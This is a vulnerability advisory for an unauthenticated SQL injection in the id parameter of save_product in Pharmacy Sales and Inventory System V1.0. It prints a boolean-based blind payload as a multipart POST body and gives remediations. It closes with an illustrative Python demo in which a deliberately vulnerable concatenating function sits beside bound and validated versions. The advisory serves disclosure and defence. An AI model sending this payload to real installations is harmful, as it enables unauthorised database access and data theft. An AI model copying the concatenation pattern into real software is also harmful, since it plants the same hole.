# Vulnerability Summary: SQL Injection in Pharmacy Sales and Inventory System V1.0

## Vulnerability Overview

* **Affected Product**: Pharmacy Sales and Inventory System V1.0
* **Vulnerability Type**: SQL Injection
* **Vulnerable File**: `/ajax.php?action=save_product`
* **Vulnerable Parameter**: `id`
* **Exploitation Conditions**: No authentication or authorization required.
* **Root Cause**: Attackers can inject malicious code into the `id` parameter, which is then used directly in SQL queries without proper sanitization or validation.

## Impact Scope

* Attackers can gain unauthorized access to the database.
* Leakage of sensitive data.
* Data tampering.
* Full control over the system.
* Service disruption.

## Vulnerability Details and POC

* **Type**: Boolean-based blind SQL injection
* **Payload**:

```text
---
Parameter: MULTIPART id ((custom) POST)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: -----------------3738858121816587200387936454
Content-Disposition: form-data; name="id"

(SELECT (CASE WHEN (7479=7479) THEN '1' ELSE (SELECT 5203 UNION SELECT 7749) END))
-----------------3738858121816587200387936454
Content-Disposition: form-data; name="name"

1111
-----------------3738858121816587200387936454---
```

## Remediation

1. **Use Prepared Statements and Parameterized Queries**: Prepared statements prevent SQL injection by separating SQL code from user input data. When using prepared statements, user input values are treated as pure data and are not interpreted as SQL code.
2. **Input Validation and Filtering**: Strictly validate and filter user input data to ensure it conforms to the expected format.
3. **Minimize Database User Privileges**: Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with elevated privileges (such as 'root' or 'admin') for routine operations.
4. **Regular Security Audits**: Conduct regular code and system security audits to promptly identify and fix potential security vulnerabilities.
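
The root cause and remediation steps 1 and 2, as an added example that is not code from the application (its source is not shown in this summary). Python's `sqlite3` stands in for the application's own database code; the table `product_list`, the function names and the false-condition variant of the reported payload are constructed for illustration.

```python
import re
import sqlite3

# Constructed stand-in schema; the real application's table layout is an assumption.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE product_list (id INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO product_list VALUES (?, ?)",
                   [(1, "Aspirin"), (2, "Ibuprofen")])
    return db

# id value from the report, plus the same value with its condition made false.
TRUE_ID = "(SELECT (CASE WHEN (7479=7479) THEN '1' ELSE (SELECT 5203 UNION SELECT 7749) END))"
FALSE_ID = TRUE_ID.replace("7479=7479", "7479=7480")

def save_product_vulnerable(db, form):
    # Root cause: the id field is concatenated into the statement and parsed as SQL.
    sql = "UPDATE product_list SET name = ? WHERE id = " + form["id"]
    return db.execute(sql, (form["name"],)).rowcount

def save_product_bound(db, form):
    # Remediation 1: id is bound as a value, so it is only ever compared as data.
    sql = "UPDATE product_list SET name = ? WHERE id = ?"
    return db.execute(sql, (form["name"], form["id"])).rowcount

def save_product_hardened(db, form):
    # Remediation 2 on top of 1: reject anything that is not a plain integer id.
    if not re.fullmatch(r"[0-9]{1,10}", form.get("id", "")):
        raise ValueError("id must be a positive integer")
    return save_product_bound(db, {**form, "id": int(form["id"])})

def responses(save, ids):
    # Rows updated per id value; a difference between them is a blind oracle.
    db = make_db()
    return [save(db, {"id": i, "name": "1111"}) for i in ids]

if __name__ == "__main__":
    print("vulnerable:", responses(save_product_vulnerable, [TRUE_ID, FALSE_ID]))
    print("bound:     ", responses(save_product_bound, [TRUE_ID, FALSE_ID]))
    print("hardened:  ", responses(save_product_hardened, ["1"]))
```

On the vulnerable path the two requests update a different number of rows, which is the true/false signal a boolean-based blind technique reads. Once the `id` is bound, both requests behave identically, and the validating version rejects them before any query runs.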